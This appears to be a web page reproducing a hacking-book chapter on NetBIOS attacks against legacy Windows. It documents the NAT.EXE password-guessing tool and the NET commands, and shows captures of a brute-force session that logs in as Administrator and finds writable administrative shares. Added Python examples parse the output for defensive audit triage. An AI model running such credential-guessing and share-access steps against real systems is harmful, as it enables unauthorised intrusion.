
Spiga

NetBIOS Attack Methods


This NetBIOS attack technique was verified on Windows 95, NT 4.0 Workstation,
NT 4.0 Server, NT 5.0 beta 1 Workstation, NT 5.0 beta 1 Server, and Windows 98
beta 2.1. One of the components used is NAT.EXE. A discussion of the tool, its
switches, and common techniques follows:


NAT.EXE [-o filename] [-u userlist] [-p passlist] <address>

Switches:

-o  Specify the output file. All results from the scan will be written to the
    specified file, in addition to standard output.

-u  Specify the file to read usernames from. Usernames will be read from the
    specified file when attempting to guess the password on the remote server.
    Usernames should appear one per line in the specified file.

-p  Specify the file to read passwords from. Passwords will be read from the
    specified file when attempting to guess the password on the remote server.
    Passwords should appear one per line in the specified file.

<address>
    Addresses should be specified in comma-delimited format, with no spaces.
    Valid address specifications include:

    hostname                 "hostname" is added
    127.0.0.1-127.0.0.3      adds addresses 127.0.0.1 through 127.0.0.3
    127.0.0.1-3              adds addresses 127.0.0.1 through 127.0.0.3
    127.0.0.1-3,7,10-20      adds addresses 127.0.0.1 through 127.0.0.3,
                             127.0.0.7, and 127.0.0.10 through 127.0.0.20
    hostname,127.0.0.1-3     adds "hostname" and 127.0.0.1 through 127.0.0.3

    All combinations of hostnames and address ranges as specified above are
    valid.
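The <address> grammar above is easy to get wrong when building a scope list for an audit (a bare "7" means "same first three octets as the previous address", not a host called 7). As an added example, not code from the book or from NAT.EXE itself, here is a Python parser for that format. The regexes, function names and error handling are mine; the token shapes are the ones the help text lists.

```python
import ipaddress
import re

# Token shapes taken from the NAT.EXE help text above (the regexes are mine).
_FULL_RANGE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})-(\d{1,3}(?:\.\d{1,3}){3})$")
_SHORT_RANGE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){2})\.(\d{1,3})-(\d{1,3})$")
_SINGLE_ADDR = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
_LAST_OCTETS = re.compile(r"^(\d{1,3})(?:-(\d{1,3}))?$")
_HOSTNAME = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9.-]*[A-Za-z0-9])?$")


def _octet_range(prefix, lo, hi):
    """Expand prefix.lo .. prefix.hi, validating both the prefix and the octets."""
    ipaddress.IPv4Address(f"{prefix}.0")          # rejects prefixes such as 300.1.1
    if not 0 <= lo <= hi <= 255:
        raise ValueError(f"bad last-octet range {lo}-{hi} for prefix {prefix}")
    return [f"{prefix}.{i}" for i in range(lo, hi + 1)]


def expand_address_spec(spec):
    """Expand a NAT-style <address> argument into a list of individual targets.

    'hostname,127.0.0.1-3,7,10-20' -> ['hostname', '127.0.0.1', ..., '127.0.0.20']
    A bare '7' or '10-20' is relative to the most recent dotted address.
    """
    targets = []
    prefix = None   # first three octets of the most recent dotted address
    for token in spec.split(","):
        token = token.strip()
        if m := _FULL_RANGE.match(token):
            start = ipaddress.IPv4Address(m.group(1))
            end = ipaddress.IPv4Address(m.group(2))
            if end < start:
                raise ValueError(f"range end before start: {token}")
            targets.extend(str(start + i) for i in range(int(end) - int(start) + 1))
            prefix = m.group(2).rsplit(".", 1)[0]
        elif m := _SHORT_RANGE.match(token):
            prefix = m.group(1)
            targets.extend(_octet_range(prefix, int(m.group(2)), int(m.group(3))))
        elif _SINGLE_ADDR.match(token):
            ipaddress.IPv4Address(token)             # validates each octet
            targets.append(token)
            prefix = token.rsplit(".", 1)[0]
        elif m := _LAST_OCTETS.match(token):
            if prefix is None:
                raise ValueError(f"relative range {token!r} before any address")
            lo = int(m.group(1))
            hi = int(m.group(2)) if m.group(2) else lo
            targets.extend(_octet_range(prefix, lo, hi))
        elif token.isdigit():
            raise ValueError(f"numeric element {token!r} is not a valid octet")
        elif _HOSTNAME.match(token):
            targets.append(token)
        else:
            raise ValueError(f"cannot parse address element {token!r}")
    return targets


def is_valid_spec(spec):
    """True when the whole specification expands without error."""
    try:
        expand_address_spec(spec)
        return True
    except ValueError:          # AddressValueError is a subclass of ValueError
        return False


if __name__ == "__main__":
    for example in ("127.0.0.1-3,7,10-20", "hostname,127.0.0.1-3"):
        print(example, "->", expand_address_spec(example))
```

The point of validating the expansion up front is scope control: a typo such as "127.0.0.1-300" or a relative range with no preceding address is rejected instead of silently producing a target list that does not match what was authorised.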



[8.0.1] Comparing NAT.EXE to Microsoft's own executables

[8.0.2] First, a look at NBTSTAT

First we look at the NBTSTAT command. This command was discussed in earlier
portions of the book ( [5.0.6] The Nbtstat Command ). In this section, you will
see a demonstration of how this tool is used and how it compares to other
Microsoft tools and non-Microsoft tools.

What follows is pretty much a step-by-step guide to using NBTSTAT as well as
extra information. Again, if you're interested in more NBTSTAT switches and
functions, view the [5.0.6] The Nbtstat Command portion of the book.





C:\>nbtstat -A XXX.XX.XXX.XX

       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
STUDENT1       <20>  UNIQUE      Registered
STUDENT1       <00>  UNIQUE      Registered
DOMAIN1        <00>  GROUP       Registered
DOMAIN1        <1C>  GROUP       Registered
DOMAIN1        <1B>  UNIQUE      Registered
STUDENT1       <03>  UNIQUE      Registered
DOMAIN1        <1E>  GROUP       Registered
DOMAIN1        <1D>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered

MAC Address = 00-C0-4F-C4-8C-9D



Here is a partial listing of NetBIOS name suffixes (the 16th byte of the name):

Computername  <00>  UNIQUE  Workstation Service name
              <00>  GROUP   Domain name
Server        <20>  UNIQUE  Server Service name
Computername  <03>  UNIQUE  Registered by the Messenger service. This is the
                            computer name to be added to the LMHOSTS file, which
                            is not necessary to use NAT.EXE but is necessary if
                            you would like to view the remote computer in
                            Network Neighborhood.
Username      <03>          Registered by the Messenger service.
Domainname    <1B>  UNIQUE  Registers the local computer as the master browser
                            for the domain.
Domainname    <1C>  GROUP   Registers the computer as a domain controller for
                            the domain (PDC or BDC).
Domainname    <1D>  UNIQUE  Registers the local client as the local segment's
                            master browser for the domain.
Domainname    <1E>  GROUP   Registers as a Group NetBIOS Name.
              <BF>          Network Monitor Name
              <BE>          Network Monitor Agent
              <06>          RAS Server
              <1F>          Net DDE
              <21>          RAS Client
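Reading a name table by hand is error-prone, and the suffix is what tells you a host's role: a <1C> GROUP registration means the machine is announcing itself as a domain controller, a <20> means the Server service (file sharing) is up. As an added example, not from the book, here is a Python parser for nbtstat -A output that classifies each entry using the suffix table above and summarises the host. The sample input is the page's own table, embedded here as constructed text; the role strings and function names are mine.

```python
import re

# Constructed sample: the nbtstat -A name table shown on the page.
SAMPLE_NBTSTAT = """
       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
STUDENT1       <20>  UNIQUE      Registered
STUDENT1       <00>  UNIQUE      Registered
DOMAIN1        <00>  GROUP       Registered
DOMAIN1        <1C>  GROUP       Registered
DOMAIN1        <1B>  UNIQUE      Registered
STUDENT1       <03>  UNIQUE      Registered
DOMAIN1        <1E>  GROUP       Registered
DOMAIN1        <1D>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered

MAC Address = 00-C0-4F-C4-8C-9D
"""

# Suffix meanings from the listing on the page, keyed by (suffix, type).
SUFFIX_ROLES = {
    ("00", "UNIQUE"): "workstation service name",
    ("00", "GROUP"): "domain name",
    ("20", "UNIQUE"): "server service name",
    ("03", "UNIQUE"): "messenger service (computer or user name)",
    ("1B", "UNIQUE"): "domain master browser",
    ("1C", "GROUP"): "domain controller (PDC or BDC)",
    ("1D", "UNIQUE"): "local segment master browser",
    ("1E", "GROUP"): "group NetBIOS name",
}
# Suffixes the page lists without a UNIQUE/GROUP type.
TYPELESS_SUFFIXES = {
    "BF": "Network Monitor name", "BE": "Network Monitor agent",
    "06": "RAS server", "1F": "Net DDE", "21": "RAS client",
}
# Roles worth reporting in an inventory (a host offering shares or acting as DC/browser).
REPORTED_SUFFIXES = ("20", "1B", "1C", "1D")

# Name may contain spaces/punctuation (e.g. "..__MSBROWSE__."), so match lazily up to "<xx>".
ENTRY_RE = re.compile(r"^\s*(\S.*?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)")
MAC_RE = re.compile(r"MAC Address\s*=\s*([0-9A-Fa-f-]+)")


def parse_name_table(text):
    """Return one dict per registered name: name, suffix, type, status, role."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        name, suffix, ntype, status = m.groups()
        suffix = suffix.upper()
        role = (SUFFIX_ROLES.get((suffix, ntype))
                or TYPELESS_SUFFIXES.get(suffix)
                or "unknown suffix")
        entries.append({"name": name, "suffix": suffix, "type": ntype,
                        "status": status, "role": role})
    return entries


def summarize_host(text):
    """Pull out the computer name, domain, MAC and the roles the host advertises."""
    mac = MAC_RE.search(text)
    summary = {"computer": None, "domain": None, "roles": [],
               "mac": mac.group(1) if mac else None}
    for e in parse_name_table(text):
        if e["suffix"] == "00" and e["type"] == "UNIQUE":
            summary["computer"] = e["name"]
        elif e["suffix"] == "00" and e["type"] == "GROUP":
            summary["domain"] = e["name"]
        elif e["suffix"] in REPORTED_SUFFIXES:
            summary["roles"].append(e["role"])
    return summary


if __name__ == "__main__":
    print(summarize_host(SAMPLE_NBTSTAT))
```

On the page's sample this reports STUDENT1 in DOMAIN1 advertising the Server service, a domain controller role and both master-browser roles. For a defender the useful comparison is this summary against the expected inventory: a workstation registering <1C> or an unexpected <20> on a segment is worth a look.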



[8.0.3] Intro to the NET commands

The NET command is a command that admins can execute through a DOS window to
show information about servers, networks, shares, and connections. It also has a
number of command options that you can use to add user accounts and groups,
change domain settings, and configure shares. In this section, you will learn
about these NET commands, and you will also have the outline of a NET command
batch file that can be used as a primitive network security analysis tool.
Before we continue on with the techniques, a discussion of the available options
will come first:



[8.0.4] Net Accounts: This command shows current settings for password, logon
limitations, and domain information. It also contains options for updating the
user accounts database and modifying password and logon requirements.

[8.0.5] Net Computer: This adds or deletes computers from a domain's database.

[8.0.6] Net Config Server or Net Config Workstation: Displays config info
about the server service. When used without specifying Server or Workstation,
the command displays a list of configurable services.

[8.0.7] Net Continue: Reactivates an NT service that was suspended by a NET
PAUSE command.

[8.0.8] Net File: This command lists the open files on a server and has
options for closing shared files and removing file locks.

[8.0.9] Net Group: This displays information about group names and has
options you can use to add or modify global groups on servers.

[8.1.0] Net Help: Help with these commands.

[8.1.1] Net Helpmsg message#: Get help with a particular net error or
function message.

[8.1.2] Net Localgroup: Use this to list local groups on servers. You can
also modify those groups.

[8.1.3] Net Name: This command shows the names of computers and users to
which messages are sent on the computer.

[8.1.4] Net Pause: Use this command to suspend a certain NT service.

[8.1.5] Net Print: Displays print jobs and shared queues.

[8.1.6] Net Send: Use this command to send messages to other users,
computers, or messaging names on the network.

[8.1.7] Net Session: Shows information about current sessions. Also has
commands for disconnecting certain sessions.

[8.1.8] Net Share: Use this command to list information about all resources
being shared on a computer. This command is also used to create network shares.

[8.1.9] Net Statistics Server or Workstation: Shows the statistics log.

[8.2.0] Net Stop: Stops NT services, cancelling any connections the service
is using. Let it be known that stopping one service may stop other services.

[8.2.1] Net Time: This command is used to display or set the time for a
computer or domain.

[8.2.2] Net Use: This displays a list of connected computers and has options
for connecting to and disconnecting from shared resources.

[8.2.3] Net User: This command will display a list of user accounts for the
computer, and has options for creating and modifying those accounts.

[8.2.4] Net View: This command displays a list of resources being shared on a
computer, including NetWare servers.

[8.2.5] Special note on DOS and older Windows machines: The commands listed
above are available on Windows NT Servers and Workstations; DOS and older
Windows clients have these NET commands available:



Net Config
Net Diag (runs the diagnostic program)
Net Help
Net Init (loads protocol and network adapter drivers)
Net Logoff
Net Logon
Net Password (changes password)
Net Print
Net Start
Net Stop
Net Time
Net Use
Net Ver (displays the type and version of the network redirector)
Net View

For this section, the commands being used are NET VIEW and NET USE.



[8.2.6] Actual NET VIEW and NET USE screen captures during a hack.

C:\>net view XXX.XX.XXX.XX
Shared resources at XXX.XX.XXX.XX

Share name   Type         Used as  Comment
------------------------------------------------------------------------------
NETLOGON     Disk                  Logon server share
Test         Disk
The command completed successfully.

NOTE: The C$, ADMIN$ and IPC$ shares are hidden and are not shown.

C:\>net use /?
The syntax of this command is:

NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
        [/USER:[domainname\]username]
        [[/DELETE] | [/PERSISTENT:{YES | NO}]]
NET USE [devicename | *] [password | *]] [/HOME]
NET USE [/PERSISTENT:{YES | NO}]

C:\>net use x: \\XXX.XX.XXX.XX\test
The command completed successfully.

C:\unzipped\nat10bin>net use
New connections will be remembered.

Status       Local     Remote                    Network
-------------------------------------------------------------------------------
OK           X:        \\XXX.XX.XXX.XX\test      Microsoft Windows Network
OK                     \\XXX.XX.XXX.XX\test      Microsoft Windows Network
The command completed successfully.

Here is an actual example of how the NAT.EXE program is used. The information
listed here is an actual capture of the activity. The IP addresses have been
changed to protect, well, us.



C:\>nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY

[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt
[*]--- Checking host: XXX.XX.XXX.XX
[*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Obtained server information:

Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]

[*]--- Obtained listing of shares:

        Sharename     Type     Comment
        ---------     ----     -------
        ADMIN$        Disk:    Remote Admin
        C$            Disk:    Default share
        IPC$          IPC:     Remote IPC
        NETLOGON      Disk:    Logon server share
        Test          Disk:

[*]--- This machine has a browse list:

        Server        Comment
        ---------     -------
        STUDENT1

[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access



If the default share of Everyone/Full Control is active, then you are done; the
server is hacked. If not, keep playing. You will be surprised what you find
out.
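NAT was written as an auditing tool, and its output is what an administrator gets back after running it against their own servers. The lines that matter are buried among the "Attempting" chatter: which credential succeeded, that the server let the tool talk it out of password encryption, and which shares turned out readable or writable. As an added example, not from the book or from NAT itself, here is a Python triage routine that turns an output file like the one above into ranked findings. The sample input is an excerpt of the page's capture embedded as constructed text; the finding kinds, severities and function names are mine.

```python
import re

# Constructed sample: excerpts of the NAT.EXE session shown on the page
# (addresses masked as on the page).
SAMPLE_NAT_LOG = r"""
[*]--- Checking host: XXX.XX.XXX.XX
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
"""

# Line shapes taken from the NAT output on the page (regexes are mine).
HOST_RE = re.compile(r"^\[\*\]--- Checking host: (\S+)")
CRED_RE = re.compile(r"^\[\*\]--- CONNECTED: Username: `([^']*)' Password: `([^']*)'")
READ_RE = re.compile(r"^\[\*\]--- WARNING: Able to access share: (\S+)")
WRITE_RE = re.compile(r"^\[\*\]--- WARNING: Directory is writeable: (\S+)")
DOWNGRADE_MSG = "Remote server wants us to encrypt, telling it not to"


def _is_admin_share(path):
    """ADMIN$ and the drive shares (C$, D$, ...) map onto the system itself."""
    name = path.rsplit("\\", 1)[-1]
    return name == "ADMIN$" or re.fullmatch(r"[A-Za-z]\$", name) is not None


def triage_nat_log(text):
    """Return a list of findings {host, kind, detail, severity} from NAT output."""
    findings = []
    host, downgrade = None, False
    for line in text.splitlines():
        if m := HOST_RE.match(line):
            host, downgrade = m.group(1), False       # new host resets per-host state
        elif DOWNGRADE_MSG in line:
            downgrade = True                          # server agreed to skip encryption
        elif m := CRED_RE.match(line):
            user = m.group(1)
            findings.append({"host": host, "kind": "guessed-credential", "detail": user,
                             "severity": "critical" if user.upper() == "ADMINISTRATOR" else "high"})
            if downgrade:
                # Logon succeeded after the server was talked out of password encryption.
                findings.append({"host": host, "kind": "plaintext-auth-accepted",
                                 "detail": user, "severity": "high"})
        elif m := READ_RE.match(line):
            findings.append({"host": host, "kind": "share-readable",
                             "detail": m.group(1), "severity": "medium"})
        elif m := WRITE_RE.match(line):
            path = m.group(1)
            findings.append({"host": host, "kind": "share-writable", "detail": path,
                             "severity": "critical" if _is_admin_share(path) else "high"})
    return findings


def severity_counts(findings):
    """Tally findings by severity, e.g. {'critical': 2, 'high': 1, 'medium': 2}."""
    counts = {}
    for f in findings:
        counts[f["severity"]] = counts.get(f["severity"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in triage_nat_log(SAMPLE_NAT_LOG):
        print(f"{f['severity']:8} {f['host']}  {f['kind']}: {f['detail']}")
    print(severity_counts(triage_nat_log(SAMPLE_NAT_LOG)))
```

Two points the ranking encodes: a guessed built-in Administrator password outranks everything else on the host, and a writable ADMIN$ or C$ is rated higher than a writable ordinary share because it is the system directory, not a data folder. NETLOGON in the sample is readable but never reported writable, so it stays at medium.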